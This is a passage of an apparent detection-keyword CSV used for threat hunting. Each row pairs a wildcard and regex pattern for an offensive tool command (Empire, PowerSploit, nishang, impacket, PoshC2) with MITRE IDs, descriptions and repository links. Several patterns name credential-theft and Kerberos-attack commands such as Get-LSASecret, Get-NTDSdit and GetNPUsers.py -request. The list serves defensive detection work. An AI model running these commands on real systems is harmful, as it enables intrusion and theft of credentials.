Development","https://github.com/SpecterOps/Nemesis","1","0","N/A","9","6","527","47","2024-05-01T05:08:02Z","2023-07-13T18:24:24Z" "*Get-LolDrivers*",".{0,1000}Get\-LolDrivers\s.{0,1000}","offensive_tool_keyword","PrivescCheck","Privilege Escalation Enumeration Script for Windows","T1053 - T1088","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/itm4n/PrivescCheck","1","0","N/A","10","10","2620","400","2024-03-11T20:20:35Z","2020-01-16T12:28:10Z" "*Get-LsaRunAsPPLStatus*",".{0,1000}Get\-LsaRunAsPPLStatus.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*Get-LSASecret*",".{0,1000}Get\-LSASecret.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Get-LSASecret.ps1*",".{0,1000}Get\-LSASecret\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. 
Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Get-LSASecrets.ps1*",".{0,1000}Get\-LSASecrets\.ps1.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1583 T1595 T1190","N/A","N/A","N/A","POST Exploitation tools","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Get-ModifiableRegistryAutoRun*",".{0,1000}Get\-ModifiableRegistryAutoRun.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-ModifiableRegistryAutoRun*",".{0,1000}Get\-ModifiableRegistryAutoRun.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Get-ModifiableScheduledTaskFile*",".{0,1000}Get\-ModifiableScheduledTaskFile.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","PowerUp.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-ModifiableScheduledTaskFile*",".{0,1000}Get\-ModifiableScheduledTaskFile.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Get-ModifiableService*",".{0,1000}Get\-ModifiableService.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Get-NestedGroupMembership *",".{0,1000}Get\-NestedGroupMembership\s.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tools","https://github.com/gustanini/PowershellTools","1","0","N/A","10","1","75","12","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z" "*Get-NestedGroupMembership.ps1*",".{0,1000}Get\-NestedGroupMembership\.ps1.{0,1000}","offensive_tool_keyword","PowershellTools","Powershell tools used for Red Team / Pentesting","T1087.002 - T1069.001 - T1069.002 - T1598.002 - T1083 - T1558.003 - T1564.001 - T1112","TA0007 - TA0003 - TA0006 - TA0040 - TA0005 - TA0003","N/A","N/A","Exploitation tools","https://github.com/gustanini/PowershellTools","1","1","N/A","10","1","75","12","2024-01-08T10:33:20Z","2023-10-26T16:49:59Z" "*Get-NetComputer -Unconstrainuser*",".{0,1000}Get\-NetComputer\s\-Unconstrainuser.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-NetDomainController*",".{0,1000}Get\-NetDomainController.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Get-NetDomainTrust*",".{0,1000}Get\-NetDomainTrust.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*get-netfileserver -domain *",".{0,1000}get\-netfileserver\s\-domain\s.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1692","317","2024-04-15T07:51:09Z","2018-07-23T08:53:32Z" "*Get-NetFileServer*",".{0,1000}Get\-NetFileServer.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. 
the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-NetFileServer*",".{0,1000}Get\-NetFileServer.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Get-NetForestDomain*",".{0,1000}Get\-NetForestDomain.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-NetGPO -UserIdentity 
*",".{0,1000}Get\-NetGPO\s\-UserIdentity\s.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Get-NetGPOGroup*",".{0,1000}Get\-NetGPOGroup.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Get-NetLocalGroup*",".{0,1000}Get\-NetLocalGroup.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Get-NetLoggedon -*",".{0,1000}Get\-NetLoggedon\s\-.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-NetLoggedon*",".{0,1000}Get\-NetLoggedon.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Get-NetRDPSession -*",".{0,1000}Get\-NetRDPSession\s\-.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. 
cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-NetRDPSession*",".{0,1000}Get\-NetRDPSession.{0,1000}","offensive_tool_keyword","PowerSploit","PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. 
PowerSploit is comprised of the following modules and scripts","T1059 - T1053 - T1003 - T1114 - T1204","TA0002 - TA0008 - TA0011","N/A","N/A","Frameworks","https://github.com/PowerShellMafia/PowerSploit","1","0","N/A","10","10","11481","4570","2020-08-17T23:19:49Z","2012-05-26T16:08:48Z" "*Get-NetUser -SPN*",".{0,1000}Get\-NetUser\s\-SPN.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Get-NetUser -UACFilter 
NOT_ACCOUNTDISABLE*",".{0,1000}Get\-NetUser\s\-UACFilter\sNOT_ACCOUNTDISABLE.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","powerview.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*getNimplantByGuid*",".{0,1000}getNimplantByGuid.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - 
TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","720","94","2024-03-14T21:05:13Z","2023-02-13T13:42:39Z" "*GetNPUsers.py -request*",".{0,1000}GetNPUsers\.py\s\-request.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*GetNPUsers.py*",".{0,1000}GetNPUsers\.py.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","10","10","12711","3445","2024-04-29T12:46:57Z","2015-04-15T14:04:07Z" "*Get-NTDSdit*",".{0,1000}Get\-NTDSdit.{0,1000}","offensive_tool_keyword","adaudit","Powershell script to do domain auditing automation","T1087 - T1069 - T1046 - T1057 - T1114 - T1018","TA0007 - TA0003 - TA0004 - TA0006","N/A","N/A","Discovery","https://github.com/phillips321/adaudit","1","1","N/A","5","4","356","98","2024-02-26T14:05:08Z","2018-04-20T11:29:06Z" "*getnthash.py -key *",".{0,1000}getnthash\.py\s\-key\s.{0,1000}","offensive_tool_keyword","pywhisker","Python version of the C# tool for Shadow Credentials attacks","T1552.001 - T1136 - T1098","TA0003 - TA0004 - TA0005","N/A","N/A","Credential 
Access","https://github.com/ShutdownRepo/pywhisker","1","0","N/A","10","6","540","62","2023-12-17T12:46:07Z","2021-07-21T19:20:00Z" "*getnthash.py -key '8eb7a6388780dd52eb358769dc53ff685fd135f89c4ef55abb277d7d98995f72'*",".{0,1000}getnthash\.py\s\-key\s\'8eb7a6388780dd52eb358769dc53ff685fd135f89c4ef55abb277d7d98995f72\'.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*getnthash.py*",".{0,1000}getnthash\.py.{0,1000}","offensive_tool_keyword","PKINITtools","Tools for Kerberos PKINIT and relaying to AD CS","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/dirkjanm/PKINITtools","1","1","N/A","N/A","6","573","72","2024-04-12T14:04:35Z","2021-07-27T19:06:09Z" "*Get-NTLM.ps1*",".{0,1000}Get\-NTLM\.ps1.{0,1000}","offensive_tool_keyword","AutoRDPwn","AutoRDPwn is a post-exploitation framework created in Powershell designed primarily to automate the Shadow attack on Microsoft Windows computers","T1078 - T1021.001 - T1003.001 - T1547.009 - T1543.003 - T1056.001 - T1021.002","TA0004 - TA0003 - TA0006 - TA0002 - TA0008","N/A","N/A","Frameworks","https://github.com/JoelGMSec/AutoRDPwn","1","1","N/A","N/A","10","1044","504","2022-09-04T20:44:27Z","2018-07-29T08:22:20Z" "*GetNTLMChallengeBase64*",".{0,1000}GetNTLMChallengeBase64.{0,1000}","offensive_tool_keyword","cobaltstrike","Information released publicly by NCC Group's Full Spectrum Attack Simulation (FSAS) team","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - 
